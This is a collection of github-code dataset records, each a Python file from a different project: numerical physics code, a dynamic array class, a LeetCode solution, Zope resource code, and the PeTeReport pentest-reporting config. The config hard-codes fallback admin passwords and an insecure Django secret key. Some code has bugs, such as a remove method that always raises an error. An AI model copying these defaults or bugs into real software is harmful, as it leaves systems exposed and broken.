print(\"Non-mmap file of {0} bytes created\".format(os.path.getsize(\"bin_tempfile\")))\r\n print()\r\n os.unlink(FILENAME) # cleanup\r\n for i, j, k in zip(CHUNK_SIZES, mmap_write_timings, non_mmap_write_timings):\r\n print(\"Chunk Size: {0:10}{1}write():mmap write ratio [1:{2:10}]\".format(\r\n i, 4*\" \", round(k/j, 4)))","repo_name":"MTset/Python-Programming-Coursework","sub_path":"Python 04: Advanced Python/Lesson 15: Memory-Mapped Files/mmap_write_vs_file_write_old.py","file_name":"mmap_write_vs_file_write_old.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39806532760","text":"from SRC.domain.component.DomainComponent import DomainComponent\nfrom SRC.matrix.Vector import Vector\nimport numpy as np\n\nclass Node(DomainComponent):\n NOD_TAG_Node = 1\n def __init__(self, tag, ndof, *Crd):\n DomainComponent.__init__(self, tag, Node.NOD_TAG_Node)\n self.numberDOF = ndof # number of dof at Node\n self.theDOF_Group = None # pointer to associated DOF_Group\n\n \n self.Crd = Vector(len(Crd)) # Crd是可变参数,接收到的是一个 tuple\n for i in range(0,len(Crd)):\n self.Crd[i] = Crd[i] \n \n self.commitDisp = None\n self.commitVel = None\n self.commitAccel = None\n\n self.trialDisp = None\n self.trialVel = None\n self.trialAccel = None\n\n self.unbalLoad = None # unbalanced load\n self.incrDisp = None\n self.incrDeltaDisp = None\n\n # double arrays holding the disp, vel and accel value\n # 对应 np.narray\n self.disp = None \n self.vel = None\n self.accel = None\n\n self.R = None # nodal participation matrix\n self.mass = None # mass matrix\n self.unbalLoadWithInertia = None\n self.alphaM = 0 # rayleigh damping factor\n self.theEigenvectors = None \n\n self.reaction = None\n self.displayLocation = None\n\n # public methods dealing with the DOF at the node\n def getNumberDOF(self):\n return self.numberDOF\n def setDOF_Group(self, theDOF_Grp):\n self.theDOF_Group = theDOF_Grp\n def getDOF_Group(self):\n return self.theDOF_Group\n\n # public methods for obtaining the nodal coordinates\n def getCrds(self):\n return self.Crd\n \n def getDisplayCrds(self, results, fact):\n pass\n def setDisplayCrds(self, theCrds):\n pass\n # public methods for obtaining committed and trial response quantities of the node\n def getDisp(self):\n if self.commitDisp == None:\n self.createDisp()\n return self.commitDisp\n \n def getTrialDisp(self):\n if self.trialDisp == None:\n self.createDisp()\n return self.trialDisp\n \n def getTrialVel(self):\n if self.trialVel == None:\n self.createVel()\n return self.trialVel\n\n # public methods for updating the trial response quantities\n def incrTrialDisp(self, incrDispl):\n # incrDispl 是 Vector\n # check vector arg is of correct size\n if incrDispl.Size() != self.numberDOF:\n print('WARNING Node::incrTrialDisp() - incompatable sizes.\\n')\n return -2\n # create a copy if no trial exists andd add committed\n if self.trialDisp == None:\n if self.createDisp() < 0:\n print('FATAL Node::incrTrialDisp() - ran out of memory.\\n')\n exit(self, -1) #???\n for i in range(0, self.numberDOF):\n incrDispI = incrDispl(i)\n self.disp[i] = incrDispI\n self.disp[i+2*self.numberDOF] = incrDispI\n self.disp[i+3*self.numberDOF] = incrDispI\n return 0\n # otherwise set trial = incr + trial\n for i in range(0, self.numberDOF):\n incrDispI = incrDispl(i)\n self.disp[i] += incrDispI\n self.disp[i+2*self.numberDOF] += incrDispI\n self.disp[i+3*self.numberDOF] = incrDispI\n return 0\n\n # public methods for adding and obtaining load information\n # def zeroUnbalancedLoad(self):\n # if(self.unbalLoad!=[]):\n # for i in range(0,len(self.unbalLoad)):\n # self.unbalLoad[i] = 0.0\n\n # public methods dealing with the commited state of the node\n def commitState(self):\n # check disp exists, if does set commit = trial, incr = 0.0\n if self.trialDisp != None:\n for i in range(0, self.numberDOF):\n self.disp[i+self.numberDOF] = self.disp[i]\n self.disp[i+2*self.numberDOF] = 0.0\n self.disp[i+3*self.numberDOF] = 0.0\n # check vel exists, if does set commit = trial \n # check accel exists, if does set commit = trial \n return 0\n\n def revertToLastCommit(self):\n # check disp exists, if does set trial = last commit, incr = 0\n if(self.disp!=[]):\n for i in range(0,self.numberDOF):\n self.disp[i] = self.disp[i+self.numberDOF]\n self.disp[i+2*self.numberDOF] = 0.0\n self.disp[i+3*self.numberDOF] = 0.0\n # check vel exists, if does set trial = last commit\n # check accel exists, if does set trial = last commit\n\n # def revertToStart(self):\n # # check disp exists, if does set all to zero\n # if self.disp != None:\n # for i in range(0, 4*self.numberDOF):\n # self.disp[i] = 0.0\n # # check vel exists, if does set all to zero\n # # check accel exists, if does set all to zero\n\n # if self.unbalLoad != None:\n # for i in self.unbalLoad:\n # i = 0.0\n \n # return 0\n \n # public methods for dynamic analysis\n # public methods for eigen vector\n # public methods for output\n\n# AddingSensitivity: BEGIN\n# AddingSensitivity: END\n\n # private methods used to create the Vector objects \n # for the committed and trial response quantities.\n def createDisp(self):\n # trial , committed, incr = (committed-trial)\n self.disp = np.zeros(4*self.numberDOF)\n # 按照储存顺序\n self.trialDisp = Vector(self.numberDOF, self.disp[0:self.numberDOF])\n self.commitDisp = Vector(self.numberDOF, self.disp[self.numberDOF:2*self.numberDOF])\n self.incrDisp = Vector(self.numberDOF, self.disp[2*self.numberDOF:3*self.numberDOF])\n self.incrDeltaDisp = Vector(self.numberDOF, self.disp[3*self.numberDOF:-1])\n return 0\n\n def createVel(self):\n self.vel = np.zeros(2*self.numberDOF)\n self.trialVel = Vector(self.numberDOF, self.vel[0:self.numberDOF])\n self.commitVel = Vector(self.numberDOF, self.vel[self.numberDOF:2*self.numberDOF])\n return 0\n \n def createAccel(self):\n pass\n\n\n\n \n ","repo_name":"liangsihuang/SapPy","sub_path":"SRC/domain/Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":6224,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"4676243858","text":"from zope.interface import implementer\nfrom zope.interface import providedBy\nfrom zope.publisher.interfaces.browser import IBrowserPublisher\n\n\ntry:\n from plone.resource.file import FilesystemFile\n HAS_PLONE_RESOURCE = True\nexcept ImportError:\n HAS_PLONE_RESOURCE = False\n\nfrom .utility import getManagers\n\n\n@implementer(IBrowserPublisher)\nclass FilesystemFileResourceBrowserPublisher:\n def __init__(self, context, request):\n self.context = context\n self.request = request\n\n def browserDefault(self, request):\n assert HAS_PLONE_RESOURCE\n layer = providedBy(request)\n for manager in getManagers(layer):\n path = manager.queryResourcePath(self.context)\n if path is not None:\n resource = FilesystemFile(\n self.context.__parent__,\n request,\n path,\n self.context.__name__,\n )\n break\n else:\n resource = self.context\n\n return resource, ()\n","repo_name":"zopefoundation/z3c.jbot","sub_path":"src/z3c/jbot/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39499875451","text":"# https://leetcode.com/problems/koko-eating-bananas/\n# https://leetcode.com/problems/koko-eating-bananas/solution/\n#\n# binary on answer\n# similar to copy book\n\nclass Solution(object):\n def minEatingSpeed(self, piles, H):\n \"\"\"\n :type piles: List[int]\n :type H: int\n :rtype: int\n \"\"\"\n \n def check(K):\n return sum((p - 1) / K + 1 for p in piles) <= H\n \n start, end = 1, max(piles)\n while start < end:\n mid = (start + end) / 2\n if check(mid):\n end = mid\n else:\n start = mid + 1\n return start\n","repo_name":"jwyx3/practices","sub_path":"leetcode/binary-search/koko-eating-bananas.py","file_name":"koko-eating-bananas.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5183537506","text":"import os\nimport h5py \nimport numpy as np \n# -- centralms -- \nfrom centralms import util as UT\nfrom centralms import sfh as SFH \nfrom centralms import abcee as ABC\nfrom centralms import catalog as Cat\nfrom centralms import evolver as Evol\n# -- matplotlib -- \nimport matplotlib as mpl \nimport matplotlib.pyplot as plt \nmpl.rcParams['text.usetex'] = True\nmpl.rcParams['font.family'] = 'serif'\nmpl.rcParams['axes.linewidth'] = 1.5\nmpl.rcParams['axes.xmargin'] = 1\nmpl.rcParams['xtick.labelsize'] = 'x-large'\nmpl.rcParams['xtick.major.size'] = 5\nmpl.rcParams['xtick.major.width'] = 1.5\nmpl.rcParams['ytick.labelsize'] = 'x-large'\nmpl.rcParams['ytick.major.size'] = 5\nmpl.rcParams['ytick.major.width'] = 1.5\nmpl.rcParams['legend.frameon'] = False\nmpl.rcParams['hatch.linewidth'] = 0.3 \n\n\ndef model_sfh(nsnap0=15, downsampled='20'):\n ''' SFH of galaxy \n '''\n # get median of ABC posterior\n method = 'randomSFH0.5gyr.sfsmf.sfsbroken'\n abcout = ABC.readABC(method, 14)\n theta_med = [UT.median(abcout['theta'][:, i], weights=abcout['w'][:]) for i in range(len(abcout['theta'][0]))]\n \n # run model on theta_median \n tt = ABC._model_theta(method, theta_med)\n\n censub = Cat.CentralSubhalos(nsnap0=nsnap0)\n shcat = censub.Read(downsampled=downsampled) \n\n # meta data \n nsnap0 = shcat['metadata']['nsnap0']\n ngal = len(shcat['m.sham'])\n\n shcat = Evol.initSF(shcat, tt) # get SF halos \n isSF = np.arange(ngal)[shcat['galtype'] == b'sf']\n\n # initiate logSFR(logM, z) function and keywords\n logSFR_logM_z, sfr_kwargs = SFH.logSFR_initiate(shcat, isSF, \n theta_sfh=tt['sfh'], theta_sfms=tt['sfms'], testing=False)\n \n tage_i = UT.t_nsnap(nsnap0) \n tage_f = UT.t_nsnap(0) \n tage_arr = np.linspace(tage_i, tage_f, int((tage_f - tage_i)/0.1)) \n\n # get integrated stellar masses \n logM_integ, logSFRs = Evol._MassSFR_tarr(\n shcat, \n nsnap0, \n tage_arr,\n isSF=isSF, \n logSFR_logM_z=logSFR_logM_z, \n sfr_kwargs=sfr_kwargs,\n theta_sfh=tt['sfh'], \n theta_sfms=tt['sfms'], \n theta_mass=tt['mass'])\n \n z_table, t_table = UT.zt_table() \n z_of_t = lambda tt: UT.z_of_t(tt, deg=6)\n\n nomass = (logM_integ[isSF,:] == -999.) \n\n logSFR_t = np.empty((len(isSF), logM_integ.shape[1]))\n \n for i in range(len(tage_arr)): \n logSFR_t[:,i] = logSFR_logM_z(logM_integ[isSF,i], z_of_t(tage_arr[i]), **sfr_kwargs) \n\n logSFR_t[nomass] = -999.\n # keep galaxies with full SFHs and w > 0 \n keep = ((shcat['nsnap_start'][isSF] == nsnap0) & (shcat['weights'][isSF] > 0.)) \n \n f = h5py.File('sfh_4jeremy.hdf5', 'w') \n f.create_dataset('tcosmo', data=tage_arr) \n f.create_dataset('logSFR', data=logSFR_t[keep,:]) \n f.create_dataset('logMstar', data=logM_integ[isSF[keep],:])\n f.close() \n \n #fig = plt.figure(figsize=(5,5))\n #sub = fig.add_subplot(111)\n\n #for i in np.random.choice(np.sum(keep), size=10): \n # sub.plot(tage_arr, logSFR_t[isSF,:][keep][i]) \n\n #sub.set_xlabel('$t$', fontsize=25)\n #sub.set_xlim([5., 13.7])\n #fig.savefig(''.join([UT.tex_dir(), 'figs/sfh_for_jeremy.png']), bbox_inches='tight' )\n return None \n\n\nif __name__==\"__main__\": \n model_sfh(nsnap0=15, downsampled='20')\n","repo_name":"changhoonhahn/centralMS","sub_path":"doc/sfh_for_jeremy.py","file_name":"sfh_for_jeremy.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18193117257","text":"import ctypes\r\n\r\nclass DynamicArray:\r\n\r\n\r\n\tdef __init__(self):\r\n\t\tself._n = 0 # count the the actual elements\r\n\t\tself._capacity = 1 # defualt size of the arry\r\n\t\tself._A = self._make_array(self._capacity)\r\n\r\n\tdef __len__(self):\r\n\t\treturn self._n\r\n\r\n\r\n\tdef __getitem__(self, k):\r\n\t\tif not 0 <= k < self._n:\r\n\t\t\traise IndexError('Invalid index')\r\n\t\treturn self._A[k]\r\n\r\n\r\n\tdef append(self,obj):\r\n\t\tif self._n == self._capacity: # not enough room\r\n\t\t\tself._resize(2 * self._capacity) # double the capacity\r\n\t\tself._A[self._n] = obj # append the Element in the end\r\n\t\tself._n += 1\r\n\r\n\r\n\tdef remove(self, value):\r\n\t\t'''Remove first occurrence of value (or raise ValueError).'''\r\n\t\t# note: im not consider shrinking the dynamic array in this version\r\n\t\tfor k in range(self._n):\r\n\t\t\tif self._A[k] == value:\r\n\t\t\t\tfor j in range(k, self._n-1):\r\n\t\t\t\t\tself._A[j] = self._A[j+1]\r\n\t\t\t\tself._A[self._n-1] = None\r\n\t\t\t\tself._n -= 1\r\n\t\t\t\r\n\t\traise ValueError('value not found')\r\n\r\n\r\n\tdef insert(self, k, value):\r\n\t\t''' insert value at index k'''\r\n\t\tif self._n == self._capacity:\r\n\t\t\tself._resize(2 * self._capacity)\r\n\t\tfor j in range(self._n, k, -1):\r\n\t\t\tself._A[j] = self._A[j-1]\r\n\t\tself._A[k] = value\r\n\t\tself._n += 1\r\n\r\n\r\n\tdef _resize(self, c):\r\n\t\t\"\"\" resize the array to capacity c\"\"\"\r\n\t\tB = self._make_array(c)\r\n\r\n\t\tfor k in range(self._n): # for each existing value\r\n\t\t\tB[k] = self._A[k]\r\n\t\tself._A = B # using the bigger array\r\n\t\tself._capacity = c\r\n\r\n\r\n\tdef _make_array(self, c):\r\n\t\t\"\"\" make new low level array\"\"\"\r\n\t\treturn (c * ctypes.py_object)()\r\n\r\n\r\n\t\t","repo_name":"aver-roes/DS-and-algorithms-python","sub_path":"dynamic_array.py","file_name":"dynamic_array.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"427173529","text":"import environ\nenv = environ.Env()\n\nPETEREPORT_CONFIG = {\n 'admin_username': env.str('PETEREPORT_ADMIN_USERNAME', default='admin'),\n 'admin_password': env.str('PETEREPORT_ADMIN_PASSWORD', default='P3t3r3p0rt'),\n 'admin_email': env.str('PETEREPORT_ADMIN_EMAIL', default='admin@petereport.pentest'),\n 'viewer_username': env.str('PETEREPORT_VIEWER_USERNAME', default='viewer'),\n 'viewer_password': env.str('PETEREPORT_VIEWER_PASSWORD', default='v13w3r'),\n 'viewer_email': env.str('PETEREPORT_VIEWER_EMAIL', default='viewer@petereport.pentest'),\n 'application_name': env.str('PETEREPORT_APPLICATION_NAME', default='PeTeReport'),\n 'application_license': 'BSD 3-Clause Copyright ©',\n }\n\nDEFECTDOJO_CONFIG = {\n 'DefectDojoURL': env.str('PETEREPORT_DEFECTDOJO_URL', default='https://demo.defectdojo.org'),\n 'apiKey': env.str('PETEREPORT_DEJECTDOJO_APIKEY', default='Token ') # Format: Token \n}\n\nDJANGO_CONFIG = {\n 'secret_key': env.str('PETEREPORT_DJANGO_SECRET_KEY', default='django-insecure-key-CHANGEMEPLEASE-pKj9bd9h7*RMCuU'),\n 'debug': env.bool('PETEREPORT_DJANGO_DEBUG', default=False),\n 'admin_module': env.bool('PETEREPORT_DJANGO_AMIN_MODULE', default=False),\n 'allowed_hosts': env.list('PETEREPORT_DJANGO_ALLOWED_HOSTS', default=['*','localhost']),\n 'csrf_trusted_origins': env.list('PETEREPORT_DJANGO_CSRF_TRUSTED_ORIGINS', default=['https://localhost', 'https://127.0.0.1']),\n 'server_host': env.str('PETEREPORT_DJANGO_SERVER_HOST', default='http://localhost:8000/'),\n 'time_zone': env.str('PETEREPORT_DJANGO_TIME_ZONE', default='UTC'),\n 'upload_memory_size': env.int('PETEREPORT_DJANGO_UPLOAD_MEMORY_SIZE', default=10485760) # 10MB\n}\n\n\nPETEREPORT_TEMPLATES = {\n 'templates_root': 'preport/templates/tpl',\n 'tpl_default_directory': 'default',\n 'storage_reports': 'storage_reports',\n 'html_template': 'bootstrap-4-pandoc-template/template.html',\n 'pdf_latex_template': 'petereport.latex',\n 'report_id_format': env.str('PETEREPORT_REPORT_ID', default='PEN-DOC-'),\n 'report_csv_name': env.str('PETEREPORT_REPORT_CSV_NAME', default='PEN-CSV'),\n 'report_markdown_name': env.str('PETEREPORT_REPORT_MARKDOWN_NAME', default='PEN-MD'),\n 'report_html_name': env.str('PETEREPORT_REPORT_HTML_NAME', default='PEN-HTML'),\n 'report_pdf_name': env.str('PETEREPORT_REPORT_PDF_NAME', default='PEN-PDF'),\n 'report_jupyter_name': env.str('PETEREPORT_REPORT_JUPYTER_NAME', default='PEN-JUPYTER'),\n 'report_custom_name': env.str('PETEREPORT_REPORT_CUSTOMR_NAME', default='PEN-CUSTOM'),\n 'report_pdf_language': \"en\",\n 'report_pdf_title_background': \"title.png\", # Location: app/preport/templates/tpl/pdf/default\n 'report_pdf_pages_background': \"pages.png\", # Location: app/preport/templates/tpl/pdf/default\n 'initial_text': 'TBC',\n 'titlepage-color': env.str('PETEREPORT_REPORT_TITLEPAGE_COLOR', default='e6e2e2'),\n 'titlepage-text-color': \"000000\",\n 'titlepage-rule-color': \"cc0000\",\n 'titlepage-rule-height': 2\n}\n\nPETEREPORT_MARKDOWN = {\n 'pdf_engine': env.str('PETEREPORT_PDF_ENGINE', default='pdflatex'), # pdflatex or xelatex\n 'martor_upload_method': env.str('PETEREPORT_MARTOR_UPLOAD_METHOD', default='BASE64'), # BASE64 (stored in DB) or MEDIA (path not protected, must be set 'debug': True. This is highly insecure and not encouraged for production use. Should be configured the web server (apache, nginx, etc) to serve the media content using a protected link)\n 'media_host': env.str('PETEREPORT_MEDIA_HOST', default='http://localhost:8000/') # If docker deployment, set https://, else for django deployment http://:8000\n}","repo_name":"1modm/petereport","sub_path":"app/config/petereport_config.py","file_name":"petereport_config.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","stars":407,"dataset":"github-code","pt":"61"} +{"seq_id":"37201972661","text":"import numpy as np\nimport scipy.linalg as linalg\n\nclass S_matrix:\n \"\"\"Implementation of the scattring matrix object\n \n This object is a container for NxN matrices, conventionally defined as S11, S12, S21 and S22\n Also, it implementens all the methods involving operations on scattring matrix\n \"\"\"\n\n def __init__(self,N):\n \"\"\"Creator\n \n Args:\n N (int): Dimension of each of the NxN submatrices of the scattring matrix. The total matrix is 2Nx2N\n\n Returns:\n None.\n\n \"\"\"\n self.N=N\n self.S11=np.identity(N,complex)\n self.S22=np.identity(N,complex)\n self.S12=np.zeros((N,N),complex)\n self.S21=np.zeros((N,N),complex)\n\n\n #OLD RECURSION VERSION\n #def add(self,s):\n # T1=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(self.S12,s.S21)),self.S11)\n # T2=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(s.S21,self.S12)),s.S22)\n # self.S11=np.dot(s.S11,T1)\n # self.S12=s.S12+np.dot(np.dot(s.S11,self.S12),T2)\n # self.S21=self.S21+np.dot(np.dot(self.S22,s.S21),T1)\n # self.S22=np.dot(self.S22,T2)\n\n #NEW RECURSION VERSION\n def add(self,s):\n \"\"\"Recursion method for joining two scattering matrices\n \n The connection is between the \"right\" side of self and the \"left\" side of s\n \n Args:\n s (S_matrix): scattering matrix to be joined to self. The \n\n Returns:\n None.\n\n \"\"\"\n I=np.identity(self.N,complex)\n T1=np.dot(s.S11,linalg.inv(I-np.dot(self.S12,s.S21)))\n T2=np.dot(self.S22,linalg.inv(I-np.dot(s.S21,self.S12)))\n self.S21=self.S21+np.dot(np.dot(T2,s.S21),self.S11)\n self.S11=np.dot(T1,self.S11)\n self.S12=s.S12 +np.dot(np.dot(T1,self.S12),s.S22) \n self.S22=np.dot(T2,s.S22)\n\n def add_left(self,s):\n \"\"\"Recursion method for joining two scattering matrices\n \n The connection is between the \"left\" side of self and the \"right\" side of s\n \n Args:\n s (S_matrix): scattering matrix to be joined to self. The \n\n Returns:\n None.\n\n \"\"\"\n T1=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(s.S12,self.S21)),s.S11)\n T2=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(self.S12,s.S21)),self.S22)\n s.S11=np.dot(self.S11,T1)\n s.S12=self.S12+np.dot(np.dot(self.S11,s.S12),T2)\n s.S21=s.S21+np.dot(np.dot(s.S22,self.S21),T1)\n s.S22=np.dot(s.S22,T2)\n\n def add_uniform(self,lay,d):\n \"\"\"Recursion method for addig to self the progation matrix of a given layer\n \n The connection is between the \"right\" side of self and the \"left\" side of the propagation matrix \n\n Args:\n lay (Layer): Layer of which to calculate the propagation matrix\n d (float): Thickness of the layer\n\n Returns:\n None.\n\n \"\"\"\n E=np.diag(np.exp((0+2j)*np.pi*lay.k0*lay.gamma*d))\n self.S11=np.dot(E,self.S11)\n self.S12=np.dot(E,np.dot(self.S12,E))\n self.S22=np.dot(self.S22,E)\n\n def add_uniform_left(self,lay,d):\n \"\"\"Recursion method for addig to self the progation matrix of a given layer\n \n The connection is between the \"left\" side of self and the \"right\" side of the propagation matrix \n\n Args:\n lay (Layer): Layer of which to calculate the propagation matrix\n d (float): Thickness of the layer\n\n Returns:\n None.\n\n \"\"\"\n E=np.diag(np.exp((0+2j)*np.pi*lay.k0*lay.gamma*d))\n self.S11=np.dot(self.S11,E)\n self.S21=np.dot(E,np.dot(self.S21,E))\n self.S22=np.dot(E,self.S22)\n\n\n def S_print(self,i=None,j=None):\n \"\"\"Function for printing the scattering matrix. \n \n It can print both the full matrix or the 2x2 matrix between relevant modes\n\n Args:\n i (int, optional): index of the \"left\" mode. Default is None (full matrix)\n j (int, optional): index of the \"right\" mode. Default is None (full matrix)\n\n Returns:\n None.\n\n \"\"\"\n if i==None:\n S=np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])])\n else:\n j=i if j==None else j\n S=np.vstack([np.hstack([self.S11[i,j],self.S12[i,j]]),np.hstack([self.S21[i,j],self.S22[i,j]])])\n print(S)\n\n def det(self):\n \"\"\"Calculate the determinat of the scattering matrix\n\n Returns:\n float: Determinant of the scattering matrix\n\n \"\"\"\n return linalg.det(np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])]))\n\n def S_modes(self):\n \"\"\"Solves the eigenvalue problem of the Bloch modes of the scattring matrix\n \n Returns:\n W (1darray): arrays of the eigenvalues (complex amplitude of the mode after one period)\n V (2darray): arrays of the eigenvectors (Bloch modes on the base of the guided mode in the first and last layer)\n\n \"\"\"\n ID=np.identity(self.N)\n Z=np.zeros((self.N,self.N))\n S1=np.vstack([np.hstack([self.S11,Z]),np.hstack([self.S21,-ID])])\n S2=np.vstack([np.hstack([ID,-self.S12]),np.hstack([Z,-self.S22])])\n [W,V]=linalg.eig(S1,b=S2)\n return W,V\n\n def det_modes(self,kz,d):\n ID=np.identity(self.N)\n Z=np.zeros((self.N,self.N))\n S1=np.vstack([np.hstack([self.S11,Z]),np.hstack([self.S21,-ID])])\n S2=np.vstack([np.hstack([ID,-self.S12]),np.hstack([Z,-self.S22])])\n return linalg.det(S1-np.exp((0.0+1.0j)*kz*d)*S2) \n\n def der(self,Sm,Sp,h=0.01):\n \"\"\"Calculates the first and second derivative of the scattering matrix with respec to the parameter par.\n\n Args:\n Sm (S_matrix): S matrix calculated at par=par0-h\n Sp (S_matrix): S matrix calculated at par=par0+h\n h (float, optional): Interval used to calculate the derivatives . Defaults to 0.01.\n\n Returns:\n tuple: tuple containing:\n \n - S1 (2darray): First derivative of the scattering matrix with respect to par.\n - S2 (2darray): Second derivative of the scattering matrix with respect to par.\n\n \"\"\"\n S=np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])])\n S_m=np.vstack([np.hstack([Sm.S11,Sm.S12]),np.hstack([Sm.S21,Sm.S22])])\n S_p=np.vstack([np.hstack([Sp.S11,Sp.S12]),np.hstack([Sp.S21,Sp.S22])])\n S1=(S_p-S_m)/(2.0*h)\n S2=(S_p+S_m-2.0*S)/(h*h)\n return (S1,S2)\n\n def matrix(self):\n \"\"\"Returns the full scattering matrix\n \n Returns:\n 2darray: Scattering matrix as numpy array\n\n \"\"\"\n return np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])])\n\n def output(self,u1,d2):\n \"\"\"Returs the output vectors given the input vectors\n\n Args:\n u1 (1darray): Array of modal coefficient of \"left\" inputs.\n d2 (1darray): Array of modal coefficient of \"right\" inputs.\n\n Returns:\n tuple: tuple containing:\n \n - u2 (1darray): Array of modal coefficient of \"right\" outputs.\n - d1 (1darray): Array of modal coefficient of \"left\" outputs.\n\n \"\"\"\n u2=np.add(np.dot(self.S11,u1),np.dot(self.S12,d2))\n d1=np.add(np.dot(self.S21,u1),np.dot(self.S22,d2))\n return (u2,d1)\n\n def left(self,u1,d1):\n \"\"\"Return the \"right\" inout and output vectors given the \"left\" ones\n \n\n Args:\n u1 (1darray): Array of modal coefficient of \"left\" inputs.\n d1 (1darray): Array of modal coefficient of \"left\" outputs.\n\n Returns:\n tuple: tuple containing:\n \n - u2 (1darray): Array of modal coefficient of \"right\" outputs.\n - d2 (1darray): Array of modal coefficient of \"right\" inputs.\n\n \"\"\"\n d2=linalg.solve(self.S22,d1-np.dot(self.S21,u1))\n u2=np.add(np.dot(self.S11,u1),np.dot(self.S21,d2))\n return (u2,d2)\n\n def int_f(self,S2,u):\n \"\"\"Retirn the modal coefficient between two scattering matrces (self and S2)\n\n Args:\n S2 (S_matrix): Scattering matrix to between self and the end of the structure\n u (1darray): Array of modal coefficient of \"left\" inputs to self.\n\n Returns:\n tuple: tuple containing:\n \n - uo (TYPE): Array of coefficients of left-propagating modes in the middle \n - do (TYPE): Array of coefficients of right-propagating modes in the middle\n\n \"\"\"\n ID=np.identity(self.N)\n ut=np.dot(self.S11,u)\n uo=linalg.solve(ID-np.dot(self.S12,S2.S21),ut)\n do=linalg.solve(ID-np.dot(S2.S21,self.S12),np.dot(S2.S21,ut))\n return (uo,do)\n\n def int_f_tot(self,S2,u,d):\n \"\"\"Retirn the modal coefficient between two scattering matrces (self and S2)\n\n Args:\n S2 (S_matrix): Scattering matrix to between self and the end of the structure\n u (1darray): Array of modal coefficient of \"left\" inputs to self.\n d (1darray): Array of modal coefficient of \"right\" inputs to S2\n\n Returns:\n tuple: tuple containing:\n \n - uo (TYPE): Array of coefficients of left-propagating modes in the middle \n - do (TYPE): Array of coefficients of right-propagating modes in the middle\n\n \"\"\"\n ID=np.identity(self.N)\n ut=np.dot(self.S11,u)\n dt=np.dot(S2.S22,d)\n uo=linalg.solve(ID-np.dot(self.S12,S2.S21),np.add(ut,np.dot(self.S12,dt)))\n do=linalg.solve(ID-np.dot(S2.S21,self.S12),np.add(np.dot(S2.S21,ut),dt))\n return (uo,do)\n\n int_complete = int_f_tot\n \n\n\n\n\n","repo_name":"mpasson/A_FMM","sub_path":"A_FMM/scattering.py","file_name":"scattering.py","file_ext":"py","file_size_in_byte":9939,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"13396911747","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence\nfrom core.config import cfg as config\nfrom dataset.datasets.pentathlon_dataset import UNK\n\nclass ResLayer(torch.nn.Module):\n def __init__(self, in_dim, out_dim):\n super(ResLayer, self).__init__()\n self.linear = nn.Sequential(\n nn.Linear(in_dim, out_dim),\n nn.ReLU(),\n nn.Linear(out_dim, out_dim),\n nn.ReLU()\n )\n\n def forward(self, x):\n return self.linear(x) + x\n\nclass CompoundCFG(nn.Module):\n def __init__(self, V, NT, T,\n h_dim=512,\n w_dim=512,\n z_dim=64,\n s_dim=256):\n super(CompoundCFG, self).__init__()\n assert z_dim >= 0\n self.NT_T = NT + T\n self.NT = NT\n self.T = T\n self.z_dim = z_dim\n self.s_dim = s_dim\n\n self.root_emb = nn.Parameter(torch.randn(1, s_dim))\n self.term_emb = nn.Parameter(torch.randn(T, s_dim))\n self.nonterm_emb = nn.Parameter(torch.randn(NT, s_dim))\n\n self.rule_mlp = nn.Linear(s_dim + z_dim, self.NT_T ** 2)\n self.root_mlp = nn.Sequential(nn.Linear(s_dim + z_dim, s_dim),\n ResLayer(s_dim, s_dim),\n ResLayer(s_dim, s_dim),\n nn.Linear(s_dim, NT))\n self.term_mlp = nn.Sequential(nn.Linear(s_dim + z_dim, s_dim),\n ResLayer(s_dim, s_dim),\n ResLayer(s_dim, s_dim),\n nn.Linear(s_dim, V))\n if z_dim > 0:\n self.enc_emb = nn.Embedding(V, w_dim)\n self.enc_rnn = nn.LSTM(w_dim, h_dim, bidirectional=True, num_layers=1, batch_first=True)\n self.enc_out = nn.Linear(h_dim * 2, z_dim * 2)\n\n def update_state_dict(self, new_state, strict=True):\n self.load_state_dict(new_state, strict=strict)\n\n def kl(self, mean, lvar):\n return -0.5 * (lvar - torch.pow(mean, 2) - torch.exp(lvar) + 1)\n\n def enc(self, x, l):\n x_embbed = self.enc_emb(x)\n self.enc_rnn.flatten_parameters()\n packed_x_embbed = pack_padded_sequence(x_embbed, l, batch_first=True, enforce_sorted=False)\n h, _ = self.enc_rnn(packed_x_embbed)\n unpacked_h = pad_packed_sequence(h, batch_first=True, padding_value=float('-inf'))[0]\n out = self.enc_out(unpacked_h.max(1)[0])\n\n mean = out[:, : self.z_dim]\n lvar = out[:, self.z_dim:]\n return mean, lvar\n\n def forward(self, x, l):\n b, n = x.shape[:2]\n if self.z_dim > 0:\n mean, lvar = self.enc(x, l)\n kl = self.kl(mean, lvar).sum(1)\n z = mean\n if self.training: # NOTE: use mean value during evaluation\n z = mean.new(b, mean.size(1)).normal_(0, 1)\n z = (0.5 * lvar).exp() * z + mean\n else:\n z = torch.zeros(b, 1).cuda()\n kl = None\n self.z = z\n\n def roots():\n root_emb = self.root_emb.expand(b, self.s_dim)\n if 